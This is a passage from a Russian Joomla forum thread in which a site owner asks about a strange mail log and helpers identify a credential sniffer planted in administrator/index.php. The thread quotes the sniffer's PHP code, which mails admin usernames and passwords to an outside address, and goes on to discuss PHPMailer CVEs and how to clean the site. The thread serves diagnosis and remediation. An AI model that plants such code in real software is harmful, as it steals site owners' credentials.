Странный файл появляется- php-mail.log

  • 22 Ответов
  • 568 Просмотров

0 Пользователей и 1 Гость просматривают эту тему.

*

Elimelech

  • ***
  • 173
  • 2
При заходе в админку на сервер появляеться странный файл php-mail.log в папке .php со следующим содержанием:
Код
mail() on [/home/ru908887/domains/мой сайт/public_html/administrator/index.php:18]: To: xanalyzer@yahoo.com -- Headers: 


Что это такое и откуда нои растут?
Спасибо за объяснения!

*

voland

  • ********
  • 9365
  • 420
  • СКАЙП утерян! Пишите в телеграм @volandku
Re: Странный файл появляется- php-mail.log
« Ответ #1 : 28.04.2017, 00:20:43 »
Нечто, чего стандартно нет

*

Elimelech

  • ***
  • 173
  • 2
Re: Странный файл появляется- php-mail.log
« Ответ #2 : 28.04.2017, 00:40:47 »
Нечто, чего стандартно нет

Стандартно? У Вас тоже есть такое в файле? -  "To: xanalyzer@yahoo.com"

*

voland

  • ********
  • 9365
  • 420
  • СКАЙП утерян! Пишите в телеграм @volandku

*

Elimelech

  • ***
  • 173
  • 2
Re: Странный файл появляется- php-mail.log
« Ответ #4 : 28.04.2017, 01:07:42 »

я вас не понял. Чего нет?

*

winstrool

  • *****
  • 758
  • 39
  • Свободен для работы
Re: Странный файл появляется- php-mail.log
« Ответ #5 : 28.04.2017, 01:12:46 »
Может снифер пассов какой встроен под маил функцию, зацените index.php!
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

Elimelech

  • ***
  • 173
  • 2
Re: Странный файл появляется- php-mail.log
« Ответ #6 : 28.04.2017, 01:23:21 »
Может снифер пассов какой встроен под маил функцию, зацените index.php!
Точно, какая-то зараза прописала вот что:
Код
if (isset($_POST['username']))
{

$v1 = 'Username: '.$_POST['username'].' - Password: '.$_POST['passwd'];
@mail('xanalyzer@yahoo.com', 'Rabbi pwd', $v1);

}

*

winstrool

  • *****
  • 758
  • 39
  • Свободен для работы
Re: Странный файл появляется- php-mail.log
« Ответ #7 : 28.04.2017, 01:27:57 »
Точно, какая-то зараза прописала вот что:
Код
if (isset($_POST['username']))
{

$v1 = 'Username: '.$_POST['username'].' - Password: '.$_POST['passwd'];
@mail('xanalyzer@yahoo.com', 'Rabbi pwd', $v1);

}
Так оно и есть!, вводимые логин:пасс отправляются хозяину снифера на почту!

P.S: Сам по себе он там не мог оказаться, бывают такие моменты, когда такой подход используют место бэгдоров, тут походу сайт надо лечить и безопасить!
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

Elimelech

  • ***
  • 173
  • 2
Re: Странный файл появляется- php-mail.log
« Ответ #8 : 28.04.2017, 01:37:20 »
первым делом, я так понял мне нужно сменить пароль и логин?

*

draff

  • *******
  • 2739
  • 169
  • step by step
Re: Странный файл появляется- php-mail.log
« Ответ #9 : 28.04.2017, 07:24:30 »
При заходе в админку на сервер появляеться странный файл php-mail.log в папке .php со следующим содержанием:
Код
mail() on [/home/ru908887/domains/мой сайт/public_html/administrator/index.php:18]: To: xanalyzer@yahoo.com -- Headers: 


Что это такое и откуда нои растут?
Спасибо за объяснения!

Папки .php не должно быть, то есть нужно удалить. И искать скрипт который в процессе запуска создает эту папку и  файл.

*

winstrool

  • *****
  • 758
  • 39
  • Свободен для работы
Re: Странный файл появляется- php-mail.log
« Ответ #10 : 28.04.2017, 10:41:45 »
первым делом, я так понял мне нужно сменить пароль и логин?
Нет, так как вводимые логин пасс, сразу отправляются злоумышленнику на почту, вам сначала нужно вычистить заразу, только потом менять все логины пароли в системе


Папки .php не должно быть, то есть нужно удалить. И искать скрипт который в процессе запуска создает эту папку и  файл.
В зависимости от архитектуры сервака, в этой папке ведется логирование использование mail() функции, т.е она должна быть!
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

Elimelech

  • ***
  • 173
  • 2
Re: Странный файл появляется- php-mail.log
« Ответ #11 : 28.04.2017, 13:01:29 »
Нет, так как вводимые логин пасс, сразу отправляются злоумышленнику на почту, вам сначала нужно вычистить заразу, только потом менять все логины пароли в системе
так я нашёл что у меня узвимости не закрты PHPMailer, может это оно и удалю тот код в файле index.php, что хакер насадил- этого не достаточно?

Re: Странный файл появляется- php-mail.log
« Ответ #12 : 28.04.2017, 13:14:39 »
Joomla не подвержена атакам уязвимости PHPMailer, если только не используется в стороннем приложении.
Так что дело скорее всего в другом.

*

Elimelech

  • ***
  • 173
  • 2
Re: Странный файл появляется- php-mail.log
« Ответ #13 : 28.04.2017, 13:37:29 »
Joomla не подвержена атакам уязвимости PHPMailer, если только не используется в стороннем приложении.
Так что дело скорее всего в другом.
Как так? А это шо? - Критические замечания:
Код
Уязвимости в скриптах (1)
/мой сайт/public_html/libraries/phpmailer/phpmailer.php - RCE : CVE-2016-10045, CVE-2016-10031

*

voland

  • ********
  • 9365
  • 420
  • СКАЙП утерян! Пишите в телеграм @volandku
Re: Странный файл появляется- php-mail.log
« Ответ #14 : 28.04.2017, 13:44:10 »
Выше ж написали - не подвержена.
Лучше версию (историю версий) озвучьте, наличие сторонних расширений и вареза.
Ну и может сайт не 1 на аккаунте

*

winstrool

  • *****
  • 758
  • 39
  • Свободен для работы
Re: Странный файл появляется- php-mail.log
« Ответ #15 : 28.04.2017, 13:44:24 »
Как так? А это шо? - Критические замечания:
Код
Уязвимости в скриптах (1)
/мой сайт/public_html/libraries/phpmailer/phpmailer.php - RCE : CVE-2016-10045, CVE-2016-10031
Это то, что библиотека использует уязвимый класс, но для реализации самой уязвимости, нужны определенные условия которые стандартная Joomla не использует, следовательно она не юзебильная... в соседней теме вам подсказали, что нужно сделать если хотите обновить библиотеку
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

Elimelech

  • ***
  • 173
  • 2
Re: Странный файл появляется- php-mail.log
« Ответ #16 : 28.04.2017, 13:48:12 »
в соседней теме вам подсказали, что нужно сделать если хотите обновить библиотеку
библиотеку исправил по рекомендованной теме, спасибо за подсказку!

*

Elimelech

  • ***
  • 173
  • 2
Re: Странный файл появляется- php-mail.log
« Ответ #17 : 28.04.2017, 16:49:33 »
Выше ж написали - не подвержена.
Лучше версию (историю версий) озвучьте, наличие сторонних расширений и вареза.
Ну и может сайт не 1 на аккаунте
моя наверно поддвежена, так как у меня ещё Joomla 1.5.26

P.S:В PHPMailer, популярной библиотеке для организации отправки электронный писем из приложений на языке PHP, число пользователей которой оценивается в 9 миллионов, обнаружена критическая уязвимость (CVE-2016-10033), позволяющая инициировать удаленное выполнение кода без прохождения аутентификации.

Что здесь  "инициировать удаленное выполнение кода без прохождения аутентификации" - это относиться к Joomla или к чем-уто другому? Т.е я так понял можно взломать Joomla через PHPMailer уязвимость?

*

voland

  • ********
  • 9365
  • 420
  • СКАЙП утерян! Пишите в телеграм @volandku
Re: Странный файл появляется- php-mail.log
« Ответ #18 : 28.04.2017, 17:18:49 »
Вот здесь всё расписано.

Кратко - если нет сторонних форм, которые используют phpmailer в обход класса JMail, то уязвимость эксплуатировать никак нельзя.

*

voland

  • ********
  • 9365
  • 420
  • СКАЙП утерян! Пишите в телеграм @volandku
Re: Странный файл появляется- php-mail.log
« Ответ #19 : 28.04.2017, 17:19:59 »
моя наверно поддвежена, так как у меня ещё Joomla 1.5.26
В другой теме я давал ссылку на блог, где были патчи уязвимостей session
Вот если те патчи вовремя не применили, то была\есть подвержена той уязвимости

*

Elimelech

  • ***
  • 173
  • 2
Re: Странный файл появляется- php-mail.log
« Ответ #20 : 28.04.2017, 17:42:23 »
В другой теме я давал ссылку на блог, где были патчи уязвимостей session
Вот если те патчи вовремя не применили, то была\есть подвержена той уязвимости
я эти патчи применял уже давно
В другой теме я давал ссылку на блог, где были патчи уязвимостей session
Вот если те патчи вовремя не применили, то была\есть подвержена той уязвимости
да нет, вроде ещё в конце 2015 года эту заплатку я ставил на все сайты

*

voland

  • ********
  • 9365
  • 420
  • СКАЙП утерян! Пишите в телеграм @volandku
Re: Странный файл появляется- php-mail.log
« Ответ #21 : 28.04.2017, 17:45:29 »
Вроде.. может..
Смотреть надо что сидит и какие уязвимости есть.

Если поставили заплатку не в течении первого часа то существенная вероятность что заразали уже тогда.
А частичная чистка не поможет - даже если в одном месте шелл остался, всё будет повторяться

*

Elimelech

  • ***
  • 173
  • 2
Re: Странный файл появляется- php-mail.log
« Ответ #22 : 28.04.2017, 17:48:10 »
Вроде.. может..
Смотреть надо что сидит и какие уязвимости есть.

Если поставили заплатку не в течении первого часа то существенная вероятность что заразали уже тогда.
А частичная чистка не поможет - даже если в одном месте шелл остался, всё будет повторяться
сегодня пройду сайты скриптом ai-bolit, может поможет что покажит...